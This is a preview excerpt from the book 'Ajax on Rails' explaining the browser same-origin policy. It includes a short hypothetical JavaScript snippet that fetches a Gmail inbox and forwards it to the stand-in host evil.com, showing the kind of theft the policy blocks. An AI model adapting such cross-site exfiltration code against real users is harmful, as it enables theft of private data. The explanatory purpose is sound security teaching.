O'Reilly logo

Ajax on Rails by Scott Raymond

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

The Same-Origin Policy

The most notable security-related issue with Ajax is the same-origin policy, sometimes called the single domain restriction. The rule enforced by most browsers is that JavaScript code may only issue Ajax requests to URLs from the same domain as the original page—or more accurately, the combination of domain, port, and protocol. (Subdomains are considered part of the origin as well, so a page loaded from example.com won’t be able to make an Ajax request to www.example.com.)

To see the reason for the policy, just imagine what would be possible without it. For one, you could access my private email account. Take this code, for example:

new Ajax.Request('http://mail.google.com/mail/', {
  onSuccess:function(request) {
    secrets = request.responseText;
    new Ajax.Request('http://evil.com/', { parameters:secrets });
  }
});

In a world without the same-origin policy, you could place that bit of code on your site, and then get me to visit (by posting a glowing review of Ajax on Rails, of course). Because my browser is already authenticated with Gmail, the contents of my inbox would be retrieved in the background and forwarded to your server—and I’d be none the wiser.

In other words, unfettered cross-domain Ajax would enable far more serious XSS-type attacks. Fortunately, that situation isn’t possible with modern browsers, thanks to the same-origin policy.

Unfortunately, the policy seriously limits the potential for creating Ajax mashups—dynamically synthesizing data from all ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required